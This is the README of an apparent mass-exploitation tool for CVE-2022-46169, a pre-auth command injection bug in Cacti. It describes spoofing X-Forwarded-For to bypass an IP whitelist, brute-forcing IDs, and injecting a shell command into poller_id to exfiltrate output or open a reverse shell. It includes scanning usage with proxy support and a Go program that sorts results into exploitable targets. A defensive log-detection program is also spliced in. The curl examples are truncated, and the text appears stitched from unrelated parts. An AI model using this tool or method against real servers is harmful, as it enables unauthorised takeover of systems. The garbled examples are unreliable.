# CVE-2022-46169

Cacti Blind Remote Code Execution (Pre-Auth)

## Disclaimer

This is for educational purposes only. I am not responsible for your actions. Use at your own discretion.

## Explanation

This script brute-forces the values required to exploit this vulnerability. The exploit requires the following 3 values:

- Whitelisted IP address
- Correct `host_id` parameter
- Correct `local_data_ids` parameter

The file `remote_agent.php` is protected by an IP whitelist. You can bypass this by spoofing your IP address in the `X-Forwarded-For` header. Most instances will have `` or the server's own IP address whitelisted.

Next you need to brute-force the `host_id` and `local_data_ids` request parameters. This is done by enumerating pairs of integers `x,y` between a default minimum value of 1 and a default maximum value of 10.

Example request:

```sh
curl -k -H "X-Forwarded-For:" \
```

## Exploitation

After you have obtained these 3 values, you can inject a shell command into the `poller_id` key, breaking out of the intended value by placing a `;` before your command.

This is a blind RCE, so you need to send the output of your command somewhere like or open a reverse shell. Remember to URL-encode the `poller_id` value!

The following executes the command `ping $(whoami)`:

```sh
curl -k -H "X-Forwarded-For:" \
```
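From the defender's side, the two request characteristics described above (a request to `remote_agent.php` carrying an `X-Forwarded-For` header, and a `poller_id` value that contains `;` once URL-decoded) are both visible in web server logs if the log format records the header. The following Go program is an added example written for this README, not part of the bruteforce tool or of Cacti. It assumes a constructed log format of `client "request line" status "x-forwarded-for"` (with `-` when the header is absent); the log lines, the `203.0.113.x` and `192.0.2.x` addresses and the `cmd` placeholder are all made up for the example.

```go
package main

import (
	"fmt"
	"net/url"
	"strings"
)

// sampleLog holds constructed log lines in the assumed format:
// <client> "<METHOD> <target> <proto>" <status> "<X-Forwarded-For or ->".
// The traffic is invented for this example; it is not real data.
var sampleLog = []string{
	`10.0.0.5 "GET /cacti/remote_agent.php?host_id=1&poller_id=1 HTTP/1.1" 200 "-"`,
	`203.0.113.9 "GET /cacti/remote_agent.php?host_id=1&poller_id=1%3Bcmd HTTP/1.1" 200 "192.0.2.10"`,
	`203.0.113.9 "GET /cacti/index.php HTTP/1.1" 200 "-"`,
	`198.51.100.7 "GET /cacti/remote_agent.php?host_id=2&local_data_ids[]=3&poller_id=2 HTTP/1.1" 403 "192.0.2.1"`,
}

// Finding is one signal in the log that deserves review.
type Finding struct {
	Client string // remote address that sent the request
	Reason string // why the line was flagged
}

// parseLine splits a line of the assumed format into client address,
// request target and X-Forwarded-For value. ok is false for malformed lines.
func parseLine(line string) (client, target, xff string, ok bool) {
	parts := strings.Split(line, `"`)
	if len(parts) < 5 {
		return "", "", "", false
	}
	client = strings.TrimSpace(parts[0])
	req := strings.Fields(parts[1]) // METHOD TARGET PROTOCOL
	if len(req) < 2 {
		return "", "", "", false
	}
	return client, req[1], strings.TrimSpace(parts[3]), true
}

// Analyze flags requests to remote_agent.php that carry an X-Forwarded-For
// header (the whitelist-spoofing vector) or whose poller_id contains ';'
// after URL decoding (the command-injection vector). One Finding per signal.
func Analyze(lines []string) []Finding {
	var out []Finding
	for _, line := range lines {
		client, target, xff, ok := parseLine(line)
		if !ok {
			continue
		}
		u, err := url.ParseRequestURI(target)
		if err != nil || !strings.HasSuffix(u.Path, "/remote_agent.php") {
			continue
		}
		if xff != "" && xff != "-" {
			out = append(out, Finding{client, "remote_agent.php request carries X-Forwarded-For=" + xff})
		}
		// u.Query() percent-decodes values, so a URL-encoded ';' (%3B) is caught here.
		if strings.Contains(u.Query().Get("poller_id"), ";") {
			out = append(out, Finding{client, "poller_id contains ';' after URL decoding"})
		}
	}
	return out
}

func main() {
	for _, f := range Analyze(sampleLog) {
		fmt.Printf("%-14s %s\n", f.Client, f.Reason)
	}
}
```

The `403` on the last sample line is flagged too: a rejected request still shows that someone probed the whitelist, which is the point at which reviewing the proxy's trust in `X-Forwarded-For` is worthwhile.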

## Output

The script outputs in CSV format. The headers are `"target", "ip", "host_id", "data_id", "url"`.

If the `url` value is missing, it means the script was able to bypass the IP restriction but did not successfully brute-force the IDs. You can take this output and set a higher `-max` value to attempt again.

## Parsing Output

You can use the following commands to quickly parse the output file:

### Targets with IP restriction bypassed

```sh
tail -n +2 results.csv | cut -d ',' -f1 | sort -u
```

### Exploitable Targets

```sh
tail -n +2 results.csv | cut -d ',' -f5 | sort -u
```
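The `cut` pipelines above give one flat list each; when triaging a results file it is usually more useful to separate the targets into those that yielded a `url` (IDs found) and those where only the IP restriction was bypassed (rerun with a higher `-max`), with duplicates removed and a target never listed in both sets. The Go program below is an added example for this README, not part of the bruteforce tool. It assumes the CSV layout described in the Output section, tolerates rows that are short of the 5 columns as well as rows with an empty `url`, and uses constructed sample rows (`192.0.2.x` addresses and a placeholder `url`); the `ip` column is taken to be the address that bypassed the restriction, which is an assumption.

```go
package main

import (
	"encoding/csv"
	"fmt"
	"io"
	"sort"
	"strings"
)

// sampleCSV is constructed output in the tool's column layout
// "target","ip","host_id","data_id","url". The rows are invented:
// one target with two id pairs found, two with an empty url, and one
// short row that has no url column at all.
const sampleCSV = `target,ip,host_id,data_id,url
192.0.2.10,192.0.2.10,1,3,https://192.0.2.10/cacti/remote_agent.php
192.0.2.11,192.0.2.11,,,
192.0.2.12,192.0.2.12,,,
192.0.2.10,192.0.2.10,1,4,https://192.0.2.10/cacti/remote_agent.php
192.0.2.13,192.0.2.13
`

// Triage is the result of classifying a results.csv file.
type Triage struct {
	Exploitable []string // targets with a url value: IDs were found
	RetryNeeded []string // IP restriction bypassed only: rerun with a higher -max
}

// Parse reads the CSV, skips the header, and classifies every target.
// A target appearing both with and without a url is reported once, as exploitable.
func Parse(r io.Reader) (Triage, error) {
	cr := csv.NewReader(r)
	cr.FieldsPerRecord = -1 // accept rows with fewer than 5 columns
	rows, err := cr.ReadAll()
	if err != nil {
		return Triage{}, err
	}
	exploitable := map[string]bool{}
	bypassOnly := map[string]bool{}
	for i, rec := range rows {
		if i == 0 || len(rec) == 0 || strings.TrimSpace(rec[0]) == "" {
			continue // header or blank row
		}
		target := strings.TrimSpace(rec[0])
		hasURL := len(rec) >= 5 && strings.TrimSpace(rec[4]) != ""
		if hasURL {
			exploitable[target] = true
		} else {
			bypassOnly[target] = true
		}
	}
	var t Triage
	for target := range exploitable {
		t.Exploitable = append(t.Exploitable, target)
	}
	for target := range bypassOnly {
		if !exploitable[target] { // do not ask for a retry of a target already done
			t.RetryNeeded = append(t.RetryNeeded, target)
		}
	}
	sort.Strings(t.Exploitable)
	sort.Strings(t.RetryNeeded)
	return t, nil
}

func main() {
	t, err := Parse(strings.NewReader(sampleCSV))
	if err != nil {
		fmt.Println("parse error:", err)
		return
	}
	fmt.Println("exploitable:   ", strings.Join(t.Exploitable, " "))
	fmt.Println("retry higher -max:", strings.Join(t.RetryNeeded, " "))
}
```

To run it against a real file, replace `strings.NewReader(sampleCSV)` with an `*os.File` opened on `results.csv`; the `RetryNeeded` list is exactly the set of targets the Output section says to feed back in with a larger `-max`.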

## Build

```sh
go build -v -o bruteforce bruteforce.go
```

## Usage

```sh
./bruteforce -l targets.txt -t 50 -min 1 -max 10
```

- **Targets must be a list of IP addresses; the port may be omitted**
- A SOCKS5 proxy is supported with `-proxy socks5://`
- The default output file is `results.csv`